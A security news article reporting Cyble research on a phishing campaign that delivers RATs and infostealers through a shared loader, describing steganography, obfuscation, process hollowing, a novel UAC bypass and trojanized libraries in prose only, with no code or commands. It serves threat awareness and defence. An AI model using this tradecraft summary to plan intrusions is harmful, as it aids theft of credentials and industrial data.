Cyble researchers have identified a sophisticated attack campaign that uses obfuscation, a unique User Account Control (UAC) bypass and other stealthy techniques to deliver a unified commodity loader and infect systems with Remote Access Trojans (RATs) and infostealers.
The malware campaign targets the Manufacturing and Government sectors in Europe and the Middle East, with a specific focus on Italy, Finland, and Saudi Arabia, but shares common features with other attack campaigns, suggesting a shared malware delivery framework used by multiple “high-capability” threat actors.
“The primary objective is the exfiltration of sensitive industrial data and the compromise of high-value administrative credentials,” Cyble Research and Intelligence Labs (CRIL) said in a blog post published today.
Sophisticated Attack Campaign Uses Loader Shared by ‘High-capability’ Threat Actors
The sophisticated commodity loader at the heart of the campaign is “utilized by multiple high-capability threat actors,” Cyble said.
“Our research confirms that identical loader artifacts and execution patterns link this campaign to a broader infrastructure shared across multiple threat actors,” the researchers said.
The CRIL researchers describe “a striking uniformity of tradecraft, uncovering a persistent architectural blueprint that serves as a common thread. Despite the deployment of diverse malware payloads, the delivery mechanism remains constant.”
Standardized methodology includes the use of steganography to conceal payloads within image files, the use of string reversal and Base64 encoding for obfuscation, and delivering encoded payload URLs directly to the loader. The threat actors also “consistently abuse legitimate .NET framework executables to facilitate advanced process hollowing techniques.”
Cyble said researchers from Seqrite, Nextron Systems, and Zscaler, have documented similar findings in other campaigns, including “identical class naming conventions and execution patterns across a variety of malware families and operations.”
The researchers shared code samples of the shared loader architecture and noted, “This consistency suggests that the loader might be part of a shared delivery framework used by multiple threat actors.”
The loaders have been observed delivering a variety of RATs and infostealers, such as PureLog Stealer, Katz Stealer, DC Rat, Async Rat, and Remcos. “This indicates the loader is likely shared or sold across different threat actor groups,” Cyble said.
“The fact that multiple malware families leverage these class naming conventions as well as execution patterns … is further testament to how potent this threat is to the target nations and sectors,” Cyble added.
Campaign Uses Obfuscation, UAC Bypass
The campaign documented by Cyble uses “a diverse array of infection vectors,” such as Office documents that weaponize CVE-2017-11882, malicious SVG files, ZIP archives containing LNK shortcuts, and a unique User Account Control (UAC) bypass.
One sample used an LNK file and PowerShell to download a VBS loader, along with the UAC bypass method.
The UAC bypass technique appears in later stages of the attack, where the malware monitors process creation events and triggers a UAC prompt when a new process is launched, “tricking the system or user into granting elevated privileges under the guise of a routine operation” and “enabling the execution of a PowerShell process with elevated privileges after user approval.”
“The discovery of a novel UAC bypass confirms that this is not a static threat, but an evolving operation with a dedicated development cycle,” the researchers added. “Organizations, especially in the targeted regions, should treat ‘benign’ image files and email attachments with heightened scrutiny.”
The campaign starts as a phishing campaign masquerading as standard Purchase Order communications.
Image files are hosted on legitimate delivery platforms and contain steganographically embedded payloads, “allowing the malicious code to slip past file-based detection systems by masquerading as benign traffic.”
The threat actors use a sophisticated “hybrid assembly” technique to “trojanize” open-source libraries. “By appending malicious functions to trusted open-source libraries and recompiling them, the resulting files retain their authentic appearance and functionality, making signature-based detection extremely difficult,” the researchers said.
The infection chain is also engineered “to minimize forensic footprint,” including script obfuscation, steganographic extraction, reflective loading to run code directly in memory, and process injection to hide malicious activity within legitimate system processes.
The full Cyble blog takes an in-depth technical look at one sample and also includes recommendations, MITRE tactics, techniques and procedures (TTPs), and Indicators of Compromise (IoCs).